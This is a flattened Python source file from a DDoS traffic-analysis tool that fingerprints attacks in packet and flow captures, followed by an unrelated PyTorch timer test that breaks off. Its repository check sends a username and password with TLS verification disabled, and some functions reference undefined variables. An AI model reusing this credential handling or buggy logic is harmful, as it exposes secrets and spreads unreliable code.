logger.debug("Outliers for .:{}:. --> {} \n {}" .format(data.columns[0], outliers, data.head(5).to_string(index=False) ))
return outliers
else:
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return None
#------------------------------------------------------------------------------
# Infer the attack based on filtered dataframe
def infer_protocol_attack(df,n_type):
"""
Evaluate protocol distribution and return the used in the attack
:param df: dataframe
:param n_type: network file type (flows,pcap)
return: the list of top protocols and if the framentation protocol has found
"""
target_ip = df['ip_dst'].iloc[0]
logger.info("A total of {} IPs have attacked the victim {}".format(df.ip_src.nunique(), target_ip))
# find protocol outliers
outlier = find_outlier(df['highest_protocol'],df,n_type)
# there is no outlier
if not outlier:
# top protocol in the distribution
top1_protocol = df["highest_protocol"].value_counts().keys()[0]
# IPv4 and IPv6 as highest_protocol denotes a fragmentation attack
if bool(re.search('IPv[46]',top1_protocol)):
frag = True
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# fragmentation attack is bigger than 50% of the provided traffic (empirical value)
if (data['percent'].iloc[0] > 50):
logger.debug("Frag Attack: a large fraction of traffic {}% is related to fragmentation attack".format(data['percent'].iloc[0]))
# remove fragmentation protocol from the dataframe
data = top_n_dataframe(df['highest_protocol'],df[df['highest_protocol'] != "IPv4"],n_type)
# find outlier again by ignoring fragmentation protocol (just removed)
outlier = find_outlier(data['highest_protocol'],data,n_type)
if not outlier:
# still no outlier. It seems that we have an even protocol distribution
# this may be caused by multi-vector attack
# If remains protocols have a simmilar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
#protocol_list = data[data['percent']>30].sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# did not get outliers and it is not fragmentation attack
# multiprotocol attack with no fragmentation
frag = False
data = top_n_dataframe(df['highest_protocol'],df,n_type)
# If remains protocols have a simmilar distribution (+-30%) use them as outliers - empirical
data = data[(data['percent']>30) & (data['highest_protocol']!="others")]
protocol_list = data.sort_values(by="percent",ascending=False)['highest_protocol'].tolist()
return (protocol_list,frag)
else:
# outlier found
logger.debug("Protocol outlier found: {}".format(outlier))
# return the top1
logger.debug("Top1 protocol could be classified as outlier")
top1_protocol = df["highest_protocol"].value_counts().reset_index().head(1)['index'].tolist()
frag = False
return (top1_protocol,frag)
return None
#------------------------------------------------------------------------------
def determine_file_type(input_file):
"""
Determine what sort of file the input is.
:param input_file: The path to the file, e.g. /home/user/example.pcap
:return: The file type of the input file as a string
:raises UnsupportedFileTypeError: If input file is not recognised or not supported
"""
file_ = shutil.which("file")
if not file_:
logger.error("File software not found. It should be on the path.\n")
return (NONE)
file_info, error = subprocess.Popen([file_, input_file], stdout=subprocess.PIPE).communicate()
file_type = file_info.decode("utf-8").split()[1]
if file_type == "tcpdump":
return "pcap"
if file_type == "pcap":
return "pcap"
elif file_type == "pcap-ng":
return "pcapng"
elif file_type == "data" and (b"nfdump" in file_info or b"nfcapd" in file_info):
return "nfdump"
else:
logger.critical("The file [{}] type [{}] is not supported.".format(input_file,file_type))
sys.exit(0)
#------------------------------------------------------------------------------
def load_file(args):
"""
Wrapper to call attack file to dataframe
:param args: command line parameters
:return n_type: network file type (flows,pcap)
:return df: dataframe itself
"""
file_type = determine_file_type(args.filename)
if (file_type == NONE):
return (NONE,NONE)
if re.search(r'nfdump', file_type):
load_function = flow_to_df
n_type = FLOW_TYPE
elif re.search(r'pcap', file_type):
load_function = pcap_to_df
n_type = PCAP_TYPE
# load dataframe using threading
ret = queue.Queue()
the_process = threading.Thread(name='process', target=load_function, args=(ret,args.filename))
the_process.start()
msg = "Loading network file: `{}' ".format(args.filename)
try:
while the_process.is_alive():
if the_process:
animated_loading(msg) if not (args.quiet) else 0
the_process.join()
except (KeyboardInterrupt, SystemExit):
signal_handler(None,None)
df = ret.get()
# not a dataframe
if not isinstance(df, pd.DataFrame):
print ("\n")
return(NONE,NONE)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
return (n_type,df)
#------------------------------------------------------------------------------
def clusterization_non_multifrag(df_filtered,n_type):
"""
Generic heuristic to deal with low accuracy ratio fingerprint
:param df: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
logger.debug("ATTACK TYPE 3: NON MULTIFRAG FRAGMENTATION ATTACK")
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_filtered[field],df_filtered,n_type,True)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def clusterization_multifrag(df_filtered,n_type):
"""
Determine if multiples protocol were used for fragmentation attack
:param df: dataframe filtered by target_ip
:param n_type: network file type (flows,pcap)
:return fingerprint: json file
"""
fingerprint = {}
df_ = df.fragmentation.value_counts(normalize=True).mul(100).reset_index()
value = df_.loc[:,"fragmentation"].values[0]
df_['index']=df_['index'].astype(bool)
# percentage of packets with fragmentation
try:
frag_percentage = df_[(df_['fragmentation']>SIMILARITY_THRESHOLD) & (df_['index'].values)[0]==True].values[0][1]
except (ValueError,IndexError):
return None
# high chances to have multi protocol frag attack
if (frag_percentage > SIMILARITY_THRESHOLD):
logger.debug("ATTACK TYPE 2: MULTIPROTOCOL FRAGMENTATION ATTACK")
# find protocols responsible for that fragmentation
df_ = df.groupby(['highest_protocol','fragmentation'])['fragmentation'].count().to_frame().\
rename(columns={'fragmentation':'count'}).reset_index()
# may have more than one protocol responsible for that fragmementaiton percentage per group
# then, find the percentage of frag per protocol
df_['percent_frag'] = df_.groupby(['highest_protocol'])['count'].transform(lambda x: (x/x.sum()).mul(100))
df_['percent'] = (df_['count'] / df_['count'].sum()) * 100
df_['fragmentation']=df_['fragmentation'].astype(bool)
# protocol with high percentage of frag
protocols = df_[(df_.fragmentation == True) & (df_.percent>SIMILARITY_THRESHOLD) & \
(df_.percent_frag>SIMILARITY_THRESHOLD) ]['highest_protocol'].tolist()
if not protocols:
return
# find respective src_port
logger.info("Reprocessing attack based on protocols: {}".format(protocols))
df_filtered = df_filtered[df_filtered.highest_protocol.isin(protocols)]
srcports_frag = df[df.highest_protocol.isin(protocols)]['srcport'].unique().tolist()
outlier = find_outlier(df[df.highest_protocol.isin(protocols)]['srcport'],df_filtered,n_type)
# remove port "NONE" (assigned to IPv4 frag protocol)
if (NONE in srcports_frag) or (not outlier):
#srcports_frag.remove(NONE)
srcports_frag = [NONE]
else:
# add srcport to the fingerprint
fingerprint.update( { "srcport" : srcports_frag } )
fields = df_filtered.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
for field in fields:
outlier = find_outlier(df_filtered[field],df,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
# revome fields the may overlap srcports outliers
if 'ip_proto' in fingerprint:
del fingerprint['ip_proto']
if 'ip_ttl' in fingerprint:
del fingerprint['ip_ttl']
return (fingerprint)
#------------------------------------------------------------------------------
def generate_dot_file(df_fingerprint, df):
"""
Build .dot file that is used to generate a png file showing the
fingerprint match visualization
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: dataframe itself
"""
# sum up dataframe to plot
df_fingerprint = df_fingerprint[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_fingerprint['match'] = 1
df_remain = df[['ip_src','ip_dst']].drop_duplicates(keep="first")
df_remain['match'] = 0
df_plot = pd.concat([df_fingerprint,df_remain], ignore_index=True)
# anonymize plot data
df_plot.reset_index(inplace=True)
df_plot.drop('ip_src',axis=1,inplace=True)
df_plot = df_plot.rename(columns={"index": "ip_src"})
df_plot['ip_dst'] = "victim"
logger.debug("Distribution of filtered traffic: \n{}".format(df_plot.match.value_counts(normalize=True).mul(100)))
filename, file_extension = os.path.splitext(args.filename)
with open(filename+".dot", 'w+', encoding = 'utf-8') as f:
f.write("graph {\n")
for index, row in df_plot.iterrows():
if (row['match'] == 0 ):
f.write("\t {} -- {}[color=green,penwidth=1.0];\n".format(row["ip_src"], row["ip_dst"]))
else:
f.write("\t {} -- {}[color=red,penwidth=2.0];\n".format(row["ip_src"], row["ip_dst"]))
f.write("}\n")
print ("Use the following command to generate an image:")
print ("\t sfdp -x -Goverlap=scale -Tpng {}.dot > {}.png".format(filename,filename))
# print ("\t convert {}.png -gravity North -background YellowGreen -splice 0x18 -annotate +0+2 'Dissector' {}.gif ".format(filename,filename))
#------------------------------------------------------------------------------
def printProgressBar(value,label,fill_chars="■-"):
"""
Print progress bar
:param value: value to be printed
:param label: label used as title
:param fill_chars: char used in the animation
"""
if (args.quiet): return True
n_bar = 40 #size of progress bar
max = 100
j= value/max
sys.stdout.write('\r')
bar = fill_chars[0] * int(n_bar * j)
bar = bar + fill_chars[1] * int(n_bar * (1-j))
sys.stdout.write(f"{label.ljust(16)} | [{bar:{n_bar}s}] {int(100 * j)}% ")
sys.stdout.flush()
print ("")
return True
#------------------------------------------------------------------------------
def evaluate_fingerprint(df,df_fingerprint,fingerprints):
"""
:param df: datafram itself
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param fingerprint: json file
:return accuracy_ratio: the percentage that generated fingerprint can match in the full dataframe
"""
total_rows_matched = len(df_fingerprint)
msg = "Fingerprint evaluation"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.info("TRAFFIC MATCHED: {0}%. The generated fingerprint will filter {0}% of the analysed traffic".format(round(len(df_fingerprint)*100/len(df))))
percentage_of_ips_matched = len(df_fingerprint['ip_src'].unique().tolist() )*100/len(df.ip_src.unique().tolist())
logger.info("IPS MATCHED : {0}%. The generated fingerprint will filter {0}% of SRC_IPs".format(round(percentage_of_ips_matched)))
if not (args.quiet):
value = round(len(df_fingerprint)*100/len(df))
printProgressBar(value,"TRAFFIC MATCHED")
printProgressBar(round(percentage_of_ips_matched),"IPs MATCHED")
#
# Fields breakdown
#
if (args.verbose) or (args.debug):
count = 0
df.fragmentation = df.fragmentation.astype(str)
# for each fingerprint generated
for fingerprint in (fingerprints['attack_vector']):
count = count + 1
results = {}
for key, value in fingerprint.items():
val = ','.join(str(v) for v in value)
val = val.split()
total_rows_matched = len(df[df[key].isin(val)])
percentage = round(total_rows_matched*100/len(df))
# dict with all the fields and results
results.update( {key: percentage} )
results_sorted = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}
logger.info(" ============= FIELDS BREAKDOWN === ATTACK_VECTOR {} ============= ".format(count))
for label, percentage in results_sorted.items():
printProgressBar(percentage,label,"▭ ")
return ()
#------------------------------------------------------------------------------
def check_repository(config):
"""
Check repository access and credentials
:param config: configuration file path
"""
logger.info("Checking repository")
url = "https://raw.githubusercontent.com/ddos-clearing-house/ddos_dissector/2.0/repository.txt"
response = requests.get(url)
servers = response.content.decode("utf-8").split()
login = ""
table_column = 3
row_format ="{:>22}" * (table_column)
print(row_format.format("\nServer", "Status", "Credentials"))
print ("--"*25)
for server in servers:
try:
code = requests.get(server, timeout=2).status_code
except:
code = "OFFLINE"
if (code ==200):
code = "ONLINE"
# check credentials
headers = {
"X-Username": config['repository']['user'],
"X-Password": config['repository']['passwd'],
}
server_config = re.search('https?://(.*)/?', server).group(1)
# check if the configuration file has credentials for the online server
if (server_config in config.sections()):
if (config[server_config]):
headers = {
"X-Username": config[server_config]['user'],
"X-Password": config[server_config]['passwd'],
}
else:
logger.info("Credentials from {} is not available in the configuration file [ddosdb.conf]")
login = "NOT_OK"
try:
r = requests.get(server+"/my-permissions", headers=headers,verify=False)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to check credentials")
logger.debug("{}".format(e))
print (e)
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
login = "NOT_OK"
elif (r.status_code==200):
login = "SUCCESS"
row_format ="{:>15}" * (table_column)
print(row_format.format(server, code, login))
sys.exit(0)
#------------------------------------------------------------------------------
def get_matching_ratio(df_attack_vector,fingerprint):
"""
Get matching ratio for each fingerprint found
:param df_attack_vector dataframe related to the fingerprint
:param fingerprint dictionary with matched fields
:return dic with ration and fingerprint
"""
if not fingerprint:
return (NONE,NONE)
df_fingerprint = df_attack_vector
for key, value in fingerprint.items():
# ignore metadata field
if key not in df_fingerprint.columns:
continue
df_fingerprint = df_fingerprint[df_fingerprint[key].isin(value)]
# evaluate fingerprint matching ratio
accuracy_ratio = round(len(df_fingerprint)*100/len(df_attack_vector))
d = { "ratio" : accuracy_ratio,
"fingerprint" : fingerprint
}
return (df_fingerprint,d)
#------------------------------------------------------------------------------
def clusterization_heuristic_generic(df_attack_vector,n_type):
fields = df_attack_vector.columns.tolist()
if "eth_type" in fields: fields.remove("eth_type")
logger.debug("ATTACK TYPE 1: GENERIC ")
fingerprint = {}
for field in fields:
outlier = find_outlier(df_attack_vector[field],df_attack_vector,n_type)
if (outlier):
if (outlier != [NONE]):
fingerprint.update( {field : outlier} )
return (fingerprint)
#------------------------------------------------------------------------------
def build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag):
"""
Inspect generic protocol
:param df: datafram itself
:param n_type: network file type (flows,pcap)
:param multi_vector_attack_flag: attack composed by multiple protocols
:return fingerprints: json file
"""
# remove target IP from dataframe since it will be anonymized
del df_attack_vector['ip_dst']
attack_vector_protocol = df_attack_vector['highest_protocol'].iloc[0]
logger.info("Processing attack_vector based on {}".format(attack_vector_protocol))
# DETECTION RATE HEURISTIC
dic_ratio_array = []
### FIRST HEURISTIC
fingerprint = clusterization_heuristic_generic(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 1: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("First heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("First heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("First fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 1: matching ratio 0%")
### SECOND HEURISTIC
fingerprint = clusterization_multifrag(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
logger.debug(dict_accuracy_ratio)
if (dict_accuracy_ratio != NONE):
logger.debug('-' * 60)
logger.info("HEURISTIC 2: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Second heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Second heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Second fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 2: matching ratio 0%")
### THIRD HEURISTIC
fingerprint = clusterization_non_multifrag(df_attack_vector,n_type)
if (multi_vector_attack_flag):
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df_attack_vector,fingerprint)
else:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprint)
if (dict_accuracy_ratio != NONE):
logger.info("HEURISTIC 3: matching ratio {}%".format((dict_accuracy_ratio.get("ratio"))))
logger.debug("Third heuristic matching ratio = {}".format(dict_accuracy_ratio.get("ratio")))
logger.debug("Third heuristic fingerprint = {}".format((dict_accuracy_ratio.get("fingerprint"))))
logger.debug("Third fingerprint lengh = {}".format(len(dict_accuracy_ratio.get("fingerprint"))))
logger.debug('-' * 60)
dict_accuracy_ratio['size'] = len(dict_accuracy_ratio.get("fingerprint"))
dic_ratio_array.append(dict_accuracy_ratio)
else:
logger.info("HEURISTIC 3: matching ratio 0%")
# pick the best matching rate
df_ = pd.DataFrame(dic_ratio_array)
logger.debug("Fingerprint found")
logger.debug(df_)
data = df_.sort_values(by="size",ascending=True)
# filter fingerprint with more than 2 fields
data = data[data['size'] > 2]
data["diff"] = data.ratio.diff().fillna(0).astype(int)
# Pick the longest fingerprint (it is more specific)
# If the signature has less detection ratio (-10) get the biggest fingerprint
fingerprint = data[data['diff']>-10].sort_values(by="size",ascending=False).head(1)['fingerprint'].values[0]
# did not get bigger length fingerprint, then get the best ratio
if not fingerprint:
fingerprint = df_.sort_values(by="ratio",ascending=False).loc[0,"fingerprint"]
print (df_.sort_values(by="ratio",ascending=False).loc[0,"ratio"])
return (fingerprint)
#------------------------------------------------------------------------------
def bar(row):
"""
Plot ASCII bar
:param row: line to be printed
"""
percent = int(row['percent'])
bar_chunks, remainder = divmod(int(percent * 8 / increment), 8)
count = str(row['counts'])
label = row['index']
percent = str(percent)
bar = '█' * bar_chunks
if remainder > 0:
bar += chr(ord('█') + (8 - remainder))
# If the bar is empty, add a left one-eighth block
bar = bar or '▏'
print ("{} | {} - {}% {}".format( label.rjust(longest_label_length), count.rjust(longest_count_length),percent.rjust(3), bar ))
return ()
#------------------------------------------------------------------------------
def add_label(fingerprints,df):
"""
Add labels to fingerprint generated
"""
# UDP Service Mapping
udp_service = {
25: 'SMTP',
123: 'NTP',
1121: 'Memcached',
1194: 'OpenVPN',
1434: 'SQL server',
1718: 'H323',
1900: 'SSDP',
3074: 'Game Server',
3283: 'Apple Remote Desktop',
3702: 'WSD - Web Services Discovery',
5683: 'CoAP',
20800: 'Game Server',
27015: 'Game Server',
30718: 'IoT Lantronix',
33848: 'Jenkins Server',
37810: 'DVR DHCPDiscover',
47808: 'BACnet',
}
generic_amplification_ports = [53, 389, 123, 161, 672]
label = []
for fingerprint in fingerprints:
if (len(fingerprints)>1):
label.append("MULTI_VECTOR_ATTACK")
else:
label.append("SINGLE_VECTOR_ATTACK")
# add protocol name to label list
if 'highest_protocol' in fingerprint:
label.append(", ".join(fingerprint['highest_protocol']))
if 'dns_qry_name' in fingerprint:
label.append("DNS_QUERY")
if 'udp_length' in fingerprint:
# Based on FBI Flash Report MU-000132-DD
df_length = (df.groupby(['srcport'])['udp_length'].max()).reset_index()
if (len(df_length.udp_length>468)):
label.append("UDP_SUSPECT_LENGTH")
for port in udp_service:
if ("srcport" in fingerprint):
if (fingerprint['srcport'] == [port]):
label.append("AMPLIFICATION")
label.append("RDDoS")
label.append(udp_service[port])
# Frag attack
if 'fragmentation' in fingerprint:
value = fingerprint.get('fragmentation')[0]
if (value==True):
label.append("FRAGMENTATION")
# Generic amplification attack
if ("srcport" in fingerprint):
if (len(fingerprint['srcport']) > 1):
label.append("MULTIPROTOCOL")
for port in generic_amplification_ports:
if (port in list(fingerprint['srcport'])):
label.append("AMPLIFICATION")
continue
return (list(set(label)))
#------------------------------------------------------------------------------
def logo():
print ('''
_____ _____ _____ _____ ____
| __ \| __ \ / ____| __ \| _ \
| | | | | | | ___| (___ | | | | |_) |
| | | | | | |/ _ \\\___ \| | | | _ <
| |__| | |__| | (_) |___) | |__| | |_) |
|_____/|_____/ \___/_____/|_____/|____/
''')
#------------------------------------------------------------------------------
def import_logfile(args):
"""
Load configuration file to structured format
:param args: command line parameters
:return config: structured format
"""
if (args.config):
if os.path.isfile(args.config) and os.access(args.config, os.R_OK):
msg = "Using configuration file [{}]".format(args.config)
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug("Configuration found: {}".format(args.config))
config = configparser.ConfigParser()
config.read(args.config)
return (config)
else:
print ("Configuration file provided [{}] not found ".format(args.config))
return None
#------------------------------------------------------------------------------
def prepare_fingerprint_upload(df_fingerprint,df,fingerprints,n_type,labels,fingerprint_dir):
"""
Add addicional fields and stats to the generated fingerprint
:param df_fingerprint: dataframe filtered based on matched fingerprint
:param df: datafram itself
:param fingerprint: json file
:param n_type: network file type (flows,pcap)
:return json file
"""
fingerprint_combined = {}
fingerprint_array = []
# add one_line_fingerprint (summary) to each attack_vector fingerprint
for attack_vector in fingerprints:
attack_vector_anon = copy.deepcopy(attack_vector)
attack_vector_anon.update({"src_ips": "omitted"})
del attack_vector_anon['attack_vector_key']
one_line_fingerprint = str(attack_vector_anon).translate(str.maketrans("", "", "[]"))
attack_vector.update({"one_line_fingerprint": one_line_fingerprint })
fingerprint_array.append(attack_vector)
# fingerprints
fingerprint_combined.update({"attack_vector": fingerprint_array})
# timestamp fields
initial_timestamp = df_fingerprint['frame_time_epoch'].min()
initial_timestamp = datetime.utcfromtimestamp(initial_timestamp).strftime('%Y-%m-%d %H:%M:%S')
fingerprint_combined.update( {"start_time": initial_timestamp} )
duration_sec = df_fingerprint['frame_time_epoch'].max() - df_fingerprint['frame_time_epoch'].min()
duration_sec = '{:.2}'.format(duration_sec)
fingerprint_combined.update( {"duration_sec": float(duration_sec)} )
fingerprint_combined.update( {"total_dst_ports": len(df_fingerprint['dstport'].unique().tolist())} )
if (n_type == FLOW_TYPE):
# FIXME - should consider the sample rate
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.in_packets.mean())})
fingerprint_combined.update( {"total_packets": int(df_fingerprint.in_packets.sum())})
else:
duration_sec = float(duration_sec)
fingerprint_combined.update( {"avg_bps": int(df_fingerprint.frame_len.sum()/duration_sec) })
fingerprint_combined.update( {"total_packets": len(df_fingerprint)} )
# keys used on the repository
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint_combined.update( {"ddos_attack_key": sha256} )
fingerprint_combined.update( {"key": sha256[:15]} )
fingerprint_combined.update( {"total_ips": len(df_fingerprint['ip_src'].unique().tolist()) })
if (n_type == 0):
n_type = "FLOW"
else:
n_type = "PCAP"
fingerprint_combined.update( {"file_type": n_type})
fingerprint_combined.update( {"tags": labels})
# save fingerprint to local file in order to enable the upload via POST
if not os.path.exists(fingerprint_dir):
os.makedirs(fingerprint_dir)
json_file = "{}/{}.json".format(fingerprint_dir,sha256[:32])
try:
with open(json_file, 'w') as f_fingerprint:
json.dump(fingerprint_combined, f_fingerprint)
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
except:
logger.info("Could not save fingerprint {}".format(json_file))
return (fingerprint_combined,json_file)
#------------------------------------------------------------------------------
def print_fingerprint(fingerprint):
"""
Print a summarized version of the fingerprint generated using
the highlight module.
"""
# anon src_ips
attack_vectors_array = fingerprint["attack_vector"]
anon_attack_vector = []
for vector in attack_vectors_array:
vector.update({"src_ips": "ommited"})
anon_attack_vector.append(vector)
fingerprint["attack_vector"] = anon_attack_vector
fingerprint.update({"tags": labels})
json_str = json.dumps(fingerprint, indent=4, sort_keys=True)
msg = "Generated fingerprint"
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
print(highlight(json_str, JsonLexer(), TerminalFormatter()))
#------------------------------------------------------------------------------
def evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag):
"""
Get the fingerprint and get matching ratio using the input file
param: df input file
param: fragmentation_attack_flag fragmentation flag (network
layer) used to cluster data without layer 7 info.
"""
if (len(fingerprints)==0):
print ("Could not find a fingerprint for this network file :(" )
sys.exit()
if (len(fingerprints)==1):
# only one fingerprint was found
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,fingerprints[0])
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - one fingerprint")
logger.debug("1 fingerprint found, but it was expected more than 1, since it is a fragmentation attack")
# add fragmentation dataframe because a fragmentation attack was detected
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
# add fragmentation IPs to the evaluatioa dataframe
df_all = pd.concat([df_frag,df_fingerprint])
return (df_all)
# No fragmentation
else:
logger.debug("multivector attack with NO fragmentation - one fingerprint")
return (df_fingerprint)
# more than 1 fingerprint was found
else:
# more than 1 fingerprint and they are related to fragmentation attack
df_attack_vector_combined = pd.DataFrame()
# get dataframe per fingerprint and combine it
for attack_vector_fingerprint in fingerprints:
(df_fingerprint,dict_accuracy_ratio) = get_matching_ratio(df,attack_vector_fingerprint)
df_attack_vector_combined = pd.concat([df_attack_vector_combined,df_fingerprint])
# add fragmentation dataframe to the filtered one
if fragmentation_attack_flag:
logger.debug("multivector attack with fragmentation - 1+ fingerprints")
df_frag = df[df['highest_protocol'].str.contains('IPv[46]')]
df_attack_vector_combined = pd.concat([df_frag,df_attack_vector_combined])
# more than 1 fingerprint and they are NOT related to fragmentation attack
else:
logger.debug("multivector attack with NO fragmentation - 1+ fingerprints")
return (df_attack_vector_combined)
###############################################################################
### Main Process
if __name__ == '__main__':
logo()
signal.signal(signal.SIGINT, signal_handler)
parser = parser_add_arguments()
args = parser.parse_args()
logger = logger(args)
config = import_logfile(args)
if (args.version):
print ("version: {}".format(version))
sys.exit(0)
if (args.status):
check_repository(config)
if (not args.filename):
parser.print_help()
sys.exit(IOError("\nInput file not provided. Use '-f' for that."))
if (not os.path.exists(args.filename)):
logger.error(IOError("File " + args.filename + " is not readble"))
sys.exit(IOError("File " + args.filename + " is not readble"))
# load network file
n_type,df = load_file(args)
if not isinstance(df, pd.DataFrame):
logger.error("could not convert input file <{}>".format(args.filename))
sys.exit(1)
# checking if the provided file could be converted to dataframe
if (len(df)<2):
logger.error("could not read data from file <{}>".format(args.filename))
sys.exit(1)
##
## DETECT TARGET
##
# usually is only one target, but on anycast/load balanced may have more
(target_ip_list,df) = infer_target_ip(df,n_type)
try:
target_ip = target_ip_list[0]
except:
print ("Target IP could not be infered.")
sys.exit(0)
# build filter for victim IP
msg = "Processing target IP address: {}".format(target_ip)
df_target = df[df['ip_dst'] == target_ip]
sys.stdout.write('\r'+'['+'\u2713'+'] '+ msg+'\n')
logger.debug(msg)
##
## IDENTIFY ATTACK VECTORS (PROTOCOL)
##
(lst_attack_protocols, fragmentation_attack_flag) = infer_protocol_attack(df_target,n_type)
multi_vector_attack_flag = False
# more than one protocol as outliers
if (len(lst_attack_protocols)>1):
multi_vector_attack_flag = True
logger.info("Multi-vector attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
else:
logger.info("Single attack based on: {} : fragmentation [{}]".format(lst_attack_protocols,fragmentation_attack_flag))
##
## IDENTIFY FINGERPRINTS
##
fingerprints = []
# fingerprint per attack vector
for protocol in lst_attack_protocols:
# filter database based on protocol and target
df_attack_vector = df[(df['ip_dst'] == target_ip) & (df['highest_protocol'] == protocol)]
fingerprint = build_attack_fingerprint(df,df_attack_vector,n_type,multi_vector_attack_flag)
# get src_ips per attack vector
src_ips = []
src_ips.append(fingerprint)
df_src_ips = evaluate_fingerprint_ratio(df,src_ips,fragmentation_attack_flag)
fingerprint.update( {"src_ips": df_src_ips['ip_src'].unique().tolist()})
# generate key for this attack vector
sha256 = hashlib.sha256(str(fingerprint).encode()).hexdigest()
fingerprint.update( {"attack_vector_key": sha256} )
fingerprints.append(fingerprint)
##
## FINGERPRINT EVALUATION
##
df_filtered = evaluate_fingerprint_ratio(df,fingerprints,fragmentation_attack_flag)
# infer tags based on the generated fingerprint
labels = add_label(fingerprints,df_filtered)
# add extra fields/stats and save file locally
(enriched_fingerprint,json_file) = prepare_fingerprint_upload(df_filtered,df,fingerprints,n_type,labels,args.fingerprint_dir)
# show summarized fingerprint
print_fingerprint(enriched_fingerprint)
# print matching ratio
if (args.summary): evaluate_fingerprint(df,df_filtered,enriched_fingerprint)
# generate graphic file (dot)
if (args.graph): generate_dot_file(df_fingerprint, df)
print ("Fingerprint saved on {}".format(json_file))
if (args.upload):
(user,passw,host) = get_repository(args,config)
# upload to the repository
ret = upload(enriched_fingerprint, json_file, user, passw, host, enriched_fingerprint.get("key"))
sys.exit(0)
#EOF
|
local_timer_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
TEST_WITH_TSAN,
run_tests,
IS_WINDOWS,
IS_MACOS,
sandcastle_skip_if,
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class LocalTimerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
